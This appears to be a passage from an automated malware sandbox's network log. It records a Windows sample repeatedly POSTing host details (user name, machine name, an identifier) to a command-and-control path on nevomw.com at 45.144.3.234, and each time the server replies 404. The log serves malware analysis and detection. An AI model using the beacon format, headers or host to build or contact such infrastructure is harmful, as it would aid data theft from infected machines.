                                            201 | 192.168.2.6 | 49949 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:15.920391083 CET | 1610 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:15.978032112 CET | 1611 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:16.055699110 CET | 1611 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            202 | 192.168.2.6 | 49950 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:16.357728004 CET | 1612 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:16.410058975 CET | 1612 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:16.485110998 CET | 1613 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            203 | 192.168.2.6 | 49953 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:16.721966982 CET | 1627 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:16.774810076 CET | 1634 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:16.854005098 CET | 1634 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            204 | 192.168.2.6 | 49954 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:17.155236959 CET | 1635 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:17.207006931 CET | 1635 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:17.282335043 CET | 1636 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            205 | 192.168.2.6 | 49955 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:17.509660959 CET | 1637 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:17.562423944 CET | 1637 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:17.634665966 CET | 1637 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            206 | 192.168.2.6 | 49956 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:17.931638002 CET | 1638 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:17.984682083 CET | 1638 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:18.084548950 CET | 1639 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            207 | 192.168.2.6 | 49957 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:18.320179939 CET | 1639 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:18.373460054 CET | 1640 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:18.450665951 CET | 1640 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            208 | 192.168.2.6 | 49958 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:18.788388968 CET | 1641 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:18.841100931 CET | 1641 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:18.917300940 CET | 1642 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            209 | 192.168.2.6 | 49959 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:19.241028070 CET | 1643 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:19.293788910 CET | 1643 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:19.373668909 CET | 1643 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            21 | 192.168.2.6 | 49734 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:51.988950968 CET | 101 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:52.041430950 CET | 101 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:52.132110119 CET | 101 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            210 | 192.168.2.6 | 49960 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:19.628892899 CET | 1644 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:19.683029890 CET | 1644 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:19.758888006 CET | 1645 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            211 | 192.168.2.6 | 49961 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:20.012145042 CET | 1646 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:20.064877987 CET | 1646 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:20.137866020 CET | 1646 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            212 | 192.168.2.6 | 49962 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:20.474217892 CET | 1647 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:20.527012110 CET | 1647 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:20.612632036 CET | 1648 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            213 | 192.168.2.6 | 49963 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:20.865487099 CET | 1648 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:20.920099020 CET | 1649 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:20.993083000 CET | 1649 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            214 | 192.168.2.6 | 49964 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:21.251329899 CET | 1650 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:21.302613020 CET | 1650 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:21.376930952 CET | 1651 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            215 | 192.168.2.6 | 49965 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:21.612720013 CET | 1651 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:21.665374041 CET | 1652 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:21.738056898 CET | 1652 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            216 | 192.168.2.6 | 49966 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:21.993889093 CET | 1653 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:22.045826912 CET | 1653 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:22.123760939 CET | 1653 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            217 | 192.168.2.6 | 49967 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:22.405112982 CET | 1654 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:22.467976093 CET | 1655 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:22.542134047 CET | 1655 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
